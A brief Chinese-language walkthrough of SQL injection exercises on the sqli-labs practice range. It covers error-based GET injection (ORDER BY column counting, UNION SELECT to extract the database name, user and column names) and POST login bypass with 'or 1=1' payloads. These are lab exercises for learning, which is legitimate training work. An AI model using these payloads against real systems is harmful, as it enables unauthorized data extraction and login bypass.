SQL注入实操(get、post基于报错的注入,sqlilabs靶场)

一、get基于报错的注入

1、利用order by 判断字段数

正确

?id=1'  报错

?id=1' order by 3 --+  (编号为3正确)------可以看出为3个字段

(编号为4错误)

2、union联合注入?id=0(不存在这样的记录,查不到的意思)(报错)

?id=0' union select 1,2,3 --+    (联合查询前面查3个后面查3个)

?id=0' union select 1,database(),user() --+        报: 数据库名  用户名

?id=0%27 union select 1,group_concat(column_name),3 from information_schema.columns where table_name ='user' --+      报:数据库表名

二、post基于报错的注入

在第一关卡得到用户名和密码。

 输入上面的账号密码登入成功

上面是知道密码账号的,如果我们不知道怎么办了

可以先注入一下试一下注入:账号:Dumb  密码: 123456

万能密码

admin' or 1=1 -- (注意--后面有一个空格) (11关卡)

admin") or 1=1 -- (注意--后面有一个空格) (12关卡)

1、输入账号:Dumb   密码:123456(发现‘123456“)以”)结尾)

则万能密码是:admin") or 1=1 --